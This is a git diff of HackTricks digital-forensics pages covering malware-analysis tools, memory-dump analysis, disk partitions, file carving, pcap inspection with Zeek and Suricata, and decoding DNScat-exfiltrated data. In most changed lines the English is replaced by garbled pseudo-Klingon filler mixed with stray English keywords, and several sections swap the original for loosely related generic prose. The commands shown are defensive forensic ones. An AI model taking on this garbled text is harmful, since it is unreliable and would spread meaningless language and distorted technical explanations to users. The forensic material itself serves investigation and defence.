||||
|
||||
### FLOSS
|
||||
|
||||
[**FLOSS**](https://github.com/mandiant/flare-floss) is a tool that will try to find obfuscated strings inside executables using different techniques.
|
||||
[**FLOSS**](https://github.com/mandiant/flare-floss) jatlh executables vItlhutlh obfuscated strings naj using techniques chel.
|
||||
|
||||
### PEpper
|
||||
|
||||
[PEpper ](https://github.com/Th3Hurrican3/PEpper)checks some basic stuff inside the executable (binary data, entropy, URLs and IPs, some yara rules).
|
||||
[PEpper ](https://github.com/Th3Hurrican3/PEpper) vItlhutlh executables (binary data, entropy, URLs and IPs, yara rules) chel.
|
||||
|
||||
### PEstudio
|
||||
|
||||
[PEstudio](https://www.winitor.com/download) is a tool that allows to get information of Windows executables such as imports, exports, headers, but also will check virus total and find potential Att\&ck techniques.
|
||||
[PEstudio](https://www.winitor.com/download) vItlhutlh Windows executables (imports, exports, headers) chel, virus total chel, potential Att\&ck techniques chel.
|
||||
|
||||
### Detect It Easy(DiE)
|
||||
|
||||
[**DiE**](https://github.com/horsicq/Detect-It-Easy/) is a tool to detect if a file is **encrypted** and also find **packers**.
|
||||
[**DiE**](https://github.com/horsicq/Detect-It-Easy/) vItlhutlh file **encrypted** chel, **packers** chel.
|
||||
|
||||
### NeoPI
|
||||
|
||||
[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI)is a Python script that uses a variety of **statistical methods** to detect **obfuscated** and **encrypted** content within text/script files. The intended purpose of NeoPI is to aid in the **detection of hidden web shell code**.
|
||||
[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI) Python script vItlhutlh **statistical methods** chel, obfuscated chel, encrypted chel content text/script files chel. NeoPI intended purpose chel **detection hidden web shell code** chel.
|
||||
|
||||
### **php-malware-finder**
|
||||
|
||||
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) does its very best to detect **obfuscated**/**dodgy code** as well as files using **PHP** functions often used in **malwares**/webshells.
|
||||
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) vItlhutlh **obfuscated**/**dodgy code** chel, files PHP functions chel malwares/webshells chel.
|
||||
|
||||
### Apple Binary Signatures
|
||||
|
||||
When checking some **malware sample** you should always **check the signature** of the binary as the **developer** that signed it may be already **related** with **malware.**
|
||||
|
||||
malware sample vItlhutlh **check signature** binary chel, developer signed chel **related** malware chel.
|
||||
```bash
|
||||
#Get signer
|
||||
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
|
||||
|
@ -166,20 +188,19 @@ codesign --verify --verbose /Applications/Safari.app
|
|||
#Check if the signature is valid
|
||||
spctl --assess --verbose /Applications/Safari.app
|
||||
```
|
||||
|
||||
## Detection Techniques
|
||||
|
||||
### File Stacking
|
||||
|
||||
If you know that some folder containing the **files** of a web server was **last updated on some date**. **Check** the **date** all the **files** in the **web server were created and modified** and if any date is **suspicious**, check that file.
|
||||
**QaStaHvIS** **web server** **files** **puS** **folder** **yInISeggHommey** **date** **last updated**. **web server** **files** **created and modified** **date** **check** **'ej** **date** **'e'** **suspicious**, **file** **check**.
|
||||
|
||||
### Baselines
|
||||
|
||||
If the files of a folder **shouldn't have been modified**, you can calculate the **hash** of the **original files** of the folder and **compare** them with the **current** ones. Anything modified will be **suspicious**.
|
||||
**folder** **files** **modified** **shouldn't have been**, **hash** **'ej** **original files** **calculate** **can** **compare** **'ej** **current** **ones**. **modified** **suspicious** **will be**.
|
||||
|
||||
### Statistical Analysis
|
||||
|
||||
When the information is saved in logs you can **check statistics like how many times each file of a web server was accessed as a web shell might be one of the most**.
|
||||
**logs** **saved** **information** **when**, **web server** **file** **accessed** **times** **many** **check** **can** **shell web** **one** **might be**.
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -1,72 +1,69 @@
|
|||
# Memory dump analysis
|
||||
# qo'wI' 'oH
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>DaH jImej</strong></a><strong>! HackTricks</strong> 'e' vItlhutlh</summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **cybersecurity company** 'oH? **HackTricks** vItlhutlh **company** advertise **chavmoH**? 'ej **PEASS latest version** **download** 'ej **HackTricks PDF** **access** vItlhutlh? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **qaStaHvIS**!
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **Discover**, **exclusive NFTs** [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **collection**
|
||||
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Get**
|
||||
* **Join** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) **telegram group** [**follow**] **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share** hacking tricks **hacktricks repo** 'ej [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) **submit** PRs.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
|
||||
[**RootedCON**](https://www.rootedcon.com/) **Spain** 'e' **relevant cybersecurity event** 'ej **Europe** 'e' **important**. **technical knowledge promoting mission** 'e' **congress** 'e' **technology** 'ej **cybersecurity professionals** 'e' **boiling meeting point**.
|
||||
|
||||
{% embed url="https://www.rootedcon.com/" %}
|
||||
|
||||
## Start
|
||||
|
||||
Start **searching** for **malware** inside the pcap. Use the **tools** mentioned in [**Malware Analysis**](../malware-analysis.md).
|
||||
**pcap** 'e' **malware** **search** **Start**. [**Malware Analysis**](../malware-analysis.md) **mentioned tools** **Use**.
|
||||
|
||||
## [Volatility](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)
|
||||
|
||||
**Volatility is the main open-source framework for memory dump analysis**. This Python tool analyzes dumps from external sources or VMware VMs, identifying data like processes and passwords based on the dump's OS profile. It's extensible with plugins, making it highly versatile for forensic investigations.
|
||||
|
||||
**[Find here a cheatsheet](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)**
|
||||
**Volatility** **main open-source framework** 'e' **memory dump analysis**. **Python tool** 'e' **external sources** 'ej **VMware VMs** **analyze** 'ej **processes** 'ej **passwords** **identify** 'e' **dump's OS profile**. **plugins** 'e' **extensible**, **forensic investigations** **versatile** 'e'.
|
||||
|
||||
**[cheatsheet** **Find here**](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)**
|
||||
|
||||
## Mini dump crash report
|
||||
|
||||
When the dump is small (just some KB, maybe a few MB) then it's probably a mini dump crash report and not a memory dump.
|
||||
**dump** **small** (just some KB, maybe a few MB) **probably mini dump crash report** 'ej **memory dump** 'oH.
|
||||
|
||||
![](<../../../.gitbook/assets/image (216).png>)
|
||||
|
||||
If you have Visual Studio installed, you can open this file and bind some basic information like process name, architecture, exception info and modules being executed:
|
||||
**Visual Studio** **installed** 'oH, **file** **open** 'ej **basic information** **bind** 'ej **process name**, **architecture**, **exception info** 'ej **modules being executed**:
|
||||
|
||||
![](<../../../.gitbook/assets/image (217).png>)
|
||||
|
||||
You can also load the exception and see the decompiled instructions
|
||||
**exception** **load** 'ej **decompiled instructions** **see**
|
||||
|
||||
![](<../../../.gitbook/assets/image (219).png>)
|
||||
|
||||
![](<../../../.gitbook/assets/image (218) (1).png>)
|
||||
|
||||
Anyway, Visual Studio isn't the best tool to perform an analysis of the depth of the dump.
|
||||
|
||||
You should **open** it using **IDA** or **Radare** to inspection it in **depth**.
|
||||
|
||||
**Visual Studio** **best tool** **dump depth analysis** **perform**.
|
||||
|
||||
**IDA** 'ej **Radare** **open** **should** **inspection** 'e' **depth**.
|
||||
|
||||
|
||||
|
||||
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
|
||||
[**RootedCON**](https://www.rootedcon.com/) **Spain** 'e' **relevant cybersecurity event** 'ej **Europe** 'e' **important**. **technical knowledge promoting mission** 'e' **congress** 'e' **technology** 'ej **cybersecurity professionals** 'e' **boiling meeting point**.
|
||||
|
||||
{% embed url="https://www.rootedcon.com/" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>DaH jImej</strong></a><strong>! HackTricks</strong> 'e' vItlhutlh</summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **cybersecurity company** 'oH? **HackTricks** vItlhutlh **company** advertise **chavmoH**? 'ej **PEASS latest version** **download** 'ej **HackTricks PDF** **access** vItlhutlh? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **qaStaHvIS**!
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **Discover**, **exclusive NFTs** [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **collection**
|
||||
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Get**
|
||||
* **Join** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) **telegram group** [**follow**] **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share** hacking tricks **hacktricks repo** 'ej [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) **submit** PRs.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -4,7 +4,7 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks AWS Red Team Expert</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -63,17 +63,15 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig
|
|||
|
||||
In order to mount an MBR in Linux you first need to get the start offset (you can use `fdisk` and the `p` command)
|
||||
|
||||
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>)
|
||||
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>)
|
||||
|
||||
And then use the following code
|
||||
|
||||
```bash
|
||||
#Mount MBR in Linux
|
||||
mount -o ro,loop,offset=<Bytes>
|
||||
#63x512 = 32256Bytes
|
||||
mount -o ro,loop,offset=32256,noatime /path/to/image.dd /media/part/
|
||||
```
|
||||
|
||||
**LBA (Logical block addressing)**
|
||||
|
||||
**Logical block addressing** (**LBA**) is a common scheme used for **specifying the location of blocks** of data stored on computer storage devices, generally secondary storage systems such as hard disk drives. LBA is a particularly simple linear addressing scheme; **blocks are located by an integer index**, with the first block being LBA 0, the second LBA 1, and so on.
|
||||
|
@ -152,7 +150,6 @@ After mounting the forensics image with [**ArsenalImageMounter**](https://arsena
|
|||
![](<../../../.gitbook/assets/image (494).png>)
|
||||
|
||||
If it was a **GPT table instead of an MBR** it should appear the signature _EFI PART_ in the **sector 1** (which in the previous image is empty).
|
||||
|
||||
## File-Systems
|
||||
|
||||
### Windows file-systems list
|
||||
|
@ -165,9 +162,9 @@ If it was a **GPT table instead of an MBR** it should appear the signature _EFI
|
|||
|
||||
### FAT
|
||||
|
||||
The **FAT (File Allocation Table)** file system is designed around its core component, the file allocation table, positioned at the volume's start. This system safeguards data by maintaining **two copies** of the table, ensuring data integrity even if one is corrupted. The table, along with the root folder, must be in a **fixed location**, crucial for the system's startup process.
|
||||
**FAT (File Allocation Table)** file system jup around its core component, the file allocation table, positioned at the volume's start. This system safeguards data by maintaining **two copies** of the table, ensuring data integrity even if one is corrupted. The table, along with the root folder, must be in a **fixed location**, crucial for the system's startup process.
|
||||
|
||||
The file system's basic unit of storage is a **cluster, usually 512B**, comprising multiple sectors. FAT has evolved through versions:
|
||||
The file system's basic unit of storage is a **cluster, usually 512B**, comprising multiple sectors. FAT has evolved through versions:
|
||||
|
||||
- **FAT12**, supporting 12-bit cluster addresses and handling up to 4078 clusters (4084 with UNIX).
|
||||
- **FAT16**, enhancing to 16-bit addresses, thereby accommodating up to 65,517 clusters.
|
||||
|
|
|
@ -1,8 +1,6 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks AWS Red Team Expert</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -35,42 +33,42 @@ The most common tool used in forensics to extract files from images is [**Autops
|
|||
**Binwalk** is a tool for analyzing binary files to find embedded content. It's installable via `apt` and its source is on [GitHub](https://github.com/ReFirmLabs/binwalk).
|
||||
|
||||
**Useful commands**:
|
||||
|
||||
```bash
|
||||
sudo apt install binwalk #Insllation
|
||||
binwalk file #Displays the embedded data in the given file
|
||||
binwalk -e file #Displays and extracts some files from the given file
|
||||
binwalk --dd ".*" file #Displays and extracts all files from the given file
|
||||
```
|
||||
|
||||
## Foremost
|
||||
|
||||
Another common tool to find hidden files is **foremost**. You can find the configuration file of foremost in `/etc/foremost.conf`. If you just want to search for some specific files uncomment them. If you don't uncomment anything foremost will search for its default configured file types.
|
||||
|
||||
**Foremost** jatlhlaHbe'chugh vItlhutlh. **Foremost** DaH jatlhlaHbe'chugh vItlhutlh `/etc/foremost.conf` DaH. vaj vItlhutlh 'ejatlhlaHbe'chugh vItlhutlh vItlhutlh. vaj vItlhutlh 'ejatlhlaHbe'chugh vItlhutlh vItlhutlh.
|
||||
```bash
|
||||
sudo apt-get install foremost
|
||||
foremost -v -i file.img -o output
|
||||
#Discovered files will appear inside the folder "output"
|
||||
```
|
||||
|
||||
## **Scalpel**
|
||||
|
||||
**Scalpel** is another tool that can be used to find and extract **files embedded in a file**. In this case, you will need to uncomment from the configuration file (_/etc/scalpel/scalpel.conf_) the file types you want it to extract.
|
||||
|
||||
**Scalpel** vItlhutlh is another tool that can be used to find and extract **files embedded in a file**. In this case, you will need to uncomment from the configuration file (_/etc/scalpel/scalpel.conf_) the file types you want it to extract.
|
||||
```bash
|
||||
sudo apt-get install scalpel
|
||||
scalpel file.img -o output
|
||||
```
|
||||
|
||||
## Bulk Extractor
|
||||
|
||||
This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk\_extractor)
|
||||
|
||||
This tool can scan an image and will **extract pcaps** inside it, **network information (URLs, domains, IPs, MACs, mails)** and more **files**. You only have to do:
|
||||
|
||||
## Bulk Extractor
|
||||
|
||||
vaj tlhIngan Hol vItlhutlh: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk\_extractor)
|
||||
|
||||
vaj tlhIngan Hol vItlhutlh vItlhutlh scan 'ej **pcaps** vItlhutlh, **network information (URLs, domains, IPs, MACs, mails)** 'ej **files** vItlhutlh. bIquv, bIjatlh:
|
||||
```
|
||||
bulk_extractor memory.img -o out_folder
|
||||
```
|
||||
**tlhIngan Hol**:
|
||||
|
||||
Navigate through **all the information** that the tool has gathered (passwords?), **analyse** the **packets** (read[ **Pcaps analysis**](../pcap-inspection/)), search for **weird domains** (domains related to **malware** or **non-existent**).
|
||||
|
||||
|
@ -132,5 +130,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -2,7 +2,7 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -51,21 +51,17 @@ You can find some Wireshark tricks in:
|
|||
[**Xplico** ](https://github.com/xplico/xplico)_(only linux)_ can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico, extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on.
|
||||
|
||||
**Install**
|
||||
|
||||
```bash
|
||||
sudo bash -c 'echo "deb http://repo.xplico.org/ $(lsb_release -s -c) main" /etc/apt/sources.list'
|
||||
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 791C25CE
|
||||
sudo apt-get update
|
||||
sudo apt-get install xplico
|
||||
```
|
||||
|
||||
**Run**
|
||||
|
||||
**Qap**
|
||||
```
|
||||
/etc/init.d/apache2 restart
|
||||
/etc/init.d/xplico start
|
||||
```
|
||||
|
||||
Access to _**127.0.0.1:9876**_ with credentials _**xplico:xplico**_
|
||||
|
||||
Then create a **new case**, create a **new session** inside the case and **upload the pcap** file.
|
||||
|
@ -90,19 +86,15 @@ This is another useful tool that **analyses the packets** and sorts the informat
|
|||
* File Carving
|
||||
|
||||
### Capinfos
|
||||
|
||||
```
|
||||
capinfos capture.pcap
|
||||
```
|
||||
|
||||
### Ngrep
|
||||
|
||||
If you are **looking** for **something** inside the pcap you can use **ngrep**. Here is an example using the main filters:
|
||||
|
||||
**ngrep** **vItlhutlh** **pcap** **vaj** **ghaH** **ngrep**. **ngrep** **vaj** **example** **ghaH** **main filters** **using**.
|
||||
```bash
|
||||
ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168"
|
||||
```
|
||||
|
||||
### Carving
|
||||
|
||||
Using common carving techniques can be useful to extract files and information from the pcap:
|
||||
|
@ -126,33 +118,44 @@ You can use tools like [https://github.com/lgandx/PCredz](https://github.com/lga
|
|||
### Suricata
|
||||
|
||||
**Install and setup**
|
||||
|
||||
```
|
||||
apt-get install suricata
|
||||
apt-get install oinkmaster
|
||||
echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf
|
||||
oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules
|
||||
```
|
||||
**Qap pcap**
|
||||
|
||||
**Check pcap**
|
||||
To inspect a pcap file, you can use tools like Wireshark or tcpdump. These tools allow you to analyze network traffic captured in the pcap file.
|
||||
|
||||
Here are some steps you can follow to check a pcap file:
|
||||
|
||||
1. Open the pcap file in Wireshark or tcpdump.
|
||||
2. Analyze the captured packets to understand the network traffic.
|
||||
3. Look for any suspicious or abnormal behavior in the packets.
|
||||
4. Filter the packets based on specific criteria, such as source or destination IP address, protocol, or port number.
|
||||
5. Use the built-in features of the tool to extract relevant information from the packets, such as HTTP requests, DNS queries, or email conversations.
|
||||
6. Follow the network flow to identify the source and destination of the traffic.
|
||||
7. Look for any signs of malicious activity, such as unusual network connections, unauthorized access attempts, or data exfiltration.
|
||||
8. Take note of any findings or evidence that may be relevant to your investigation.
|
||||
|
||||
By carefully inspecting the pcap file, you can gain valuable insights into the network traffic and identify any potential security issues or breaches.
|
||||
```
|
||||
suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
|
||||
```
|
||||
|
||||
### YaraPcap
|
||||
|
||||
[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is a tool that
|
||||
[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) jup 'oH tool vItlhutlh
|
||||
|
||||
* Reads a PCAP File and Extracts Http Streams.
|
||||
* gzip deflates any compressed streams
|
||||
* Scans every file with yara
|
||||
* Writes a report.txt
|
||||
* Optionally saves matching files to a Dir
|
||||
* PCAP File vItlhutlh Http Streams.
|
||||
* gzip deflates vItlhutlh compressed streams
|
||||
* yara vItlhutlh file Scan
|
||||
* report.txt vItlhutlh vItlhutlh
|
||||
* matching files vItlhutlh Dir vItlhutlh
|
||||
|
||||
### Malware Analysis
|
||||
|
||||
Check if you can find any fingerprint of a known malware:
|
||||
known malware fingerprint vItlhutlh 'oH 'oH:
|
||||
|
||||
{% content-ref url="../malware-analysis.md" %}
|
||||
[malware-analysis.md](../malware-analysis.md)
|
||||
|
@ -160,12 +163,9 @@ Check if you can find any fingerprint of a known malware:
|
|||
|
||||
## Zeek
|
||||
|
||||
> [Zeek](https://docs.zeek.org/en/master/about.html) is a passive, open-source network traffic analyzer. Many operators use Zeek as a Network Security Monitor (NSM) to support investigations of suspicious or malicious activity. Zeek also supports a wide range of traffic analysis tasks beyond the security domain, including performance measurement and troubleshooting.
|
||||
|
||||
Basically, logs created by `zeek` aren't **pcaps**. Therefore you will need to use **other tools** to analyse the logs where the **information** about the pcaps are.
|
||||
|
||||
### Connections Info
|
||||
> [Zeek](https://docs.zeek.org/en/master/about.html) passive, open-source network traffic analyzer. Many operators Zeek Network Security Monitor (NSM) support investigations suspicious malicious activity. Zeek supports wide range traffic analysis tasks security domain, performance measurement troubleshooting.
|
||||
|
||||
Basically, logs created `zeek` aren't **pcaps**. Therefore logs **information** pcaps analysis **other tools** vItlhutlh.
|
||||
```bash
|
||||
#Get info about longest connections (add "grep udp" to see only udp traffic)
|
||||
#The longest connection might be of malware (constant reverse shell?)
|
||||
|
@ -215,9 +215,21 @@ Score,Source IP,Destination IP,Connections,Avg Bytes,Intvl Range,Size Range,Top
|
|||
1,10.55.100.111,165.227.216.194,20054,92,29,52,1,52,7774,20053,0,0,0,0
|
||||
0.838,10.55.200.10,205.251.194.64,210,69,29398,4,300,70,109,205,0,0,0,0
|
||||
```
|
||||
|
||||
### DNS info
|
||||
|
||||
DNS (Domain Name System) is a fundamental component of the internet that translates domain names into IP addresses. It allows users to access websites and other online resources using easy-to-remember domain names instead of complex IP addresses.
|
||||
|
||||
When conducting a forensic analysis of network traffic captured in a PCAP file, inspecting DNS information can provide valuable insights. Here are some key details to look for:
|
||||
|
||||
- **DNS Queries**: These are requests made by a client to resolve a domain name into an IP address. They typically include the domain name being queried and the type of record being requested (e.g., A, AAAA, MX, NS).
|
||||
|
||||
- **DNS Responses**: These are the replies from DNS servers to the client's queries. They contain the resolved IP address or other relevant information, such as the time-to-live (TTL) value.
|
||||
|
||||
- **DNS Resource Records**: These are the individual entries in a DNS response that provide specific information about a domain. Common types include A records (IPv4 address), AAAA records (IPv6 address), MX records (mail server), and NS records (name server).
|
||||
|
||||
By analyzing DNS information in a PCAP file, you can gain insights into the communication patterns, identify potential malicious activities (e.g., domain generation algorithms, command and control servers), and uncover valuable information for further investigation.
|
||||
|
||||
Remember to consider the context and cross-reference DNS information with other network artifacts to get a comprehensive understanding of the network traffic and potential security incidents.
|
||||
```bash
|
||||
#Get info about each DNS request performed
|
||||
cat dns.log | zeek-cut -c id.orig_h query qtype_name answers
|
||||
|
@ -234,8 +246,7 @@ cat dns.log | zeek-cut qtype_name | sort | uniq -c | sort -nr
|
|||
#See top DNS domain requested with rita
|
||||
rita show-exploded-dns -H --limit 10 zeek_logs
|
||||
```
|
||||
|
||||
## Other pcap analysis tricks
|
||||
## vItlhutlh
|
||||
|
||||
{% content-ref url="dnscat-exfiltration.md" %}
|
||||
[dnscat-exfiltration.md](dnscat-exfiltration.md)
|
||||
|
@ -253,7 +264,7 @@ rita show-exploded-dns -H --limit 10 zeek_logs
|
|||
|
||||
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
|
||||
[**RootedCON**](https://www.rootedcon.com/) vItlhutlh **Spain** DaH **Europe** Daq yIqIm. **technical knowledge promote** vItlhutlh, 'ej 'oH congress 'e' vItlhutlh 'e' vItlhutlh 'e' technology 'ej cybersecurity professionals Hoch 'ej Hoch.
|
||||
|
||||
{% embed url="https://www.rootedcon.com/" %}
|
||||
|
||||
|
|
|
@ -1,5 +1,3 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
@ -18,36 +16,32 @@ Other ways to support HackTricks:
|
|||
If you have pcap with data being **exfiltrated by DNSCat** (without using encryption), you can find the exfiltrated content.
|
||||
|
||||
You only need to know that the **first 9 bytes** are not real data but are related to the **C\&C communication**:
|
||||
|
||||
```python
|
||||
from scapy.all import rdpcap, DNSQR, DNSRR
|
||||
import struct
|
||||
import struct
|
||||
|
||||
f = ""
|
||||
last = ""
|
||||
for p in rdpcap('ch21.pcap'):
|
||||
if p.haslayer(DNSQR) and not p.haslayer(DNSRR):
|
||||
if p.haslayer(DNSQR) and not p.haslayer(DNSRR):
|
||||
|
||||
qry = p[DNSQR].qname.replace(".jz-n-bs.local.","").strip().split(".")
|
||||
qry = ''.join(_.decode('hex') for _ in qry)[9:]
|
||||
if last != qry:
|
||||
print(qry)
|
||||
f += qry
|
||||
last = qry
|
||||
qry = p[DNSQR].qname.replace(".jz-n-bs.local.","").strip().split(".")
|
||||
qry = ''.join(_.decode('hex') for _ in qry)[9:]
|
||||
if last != qry:
|
||||
print(qry)
|
||||
f += qry
|
||||
last = qry
|
||||
|
||||
#print(f)
|
||||
```
|
||||
|
||||
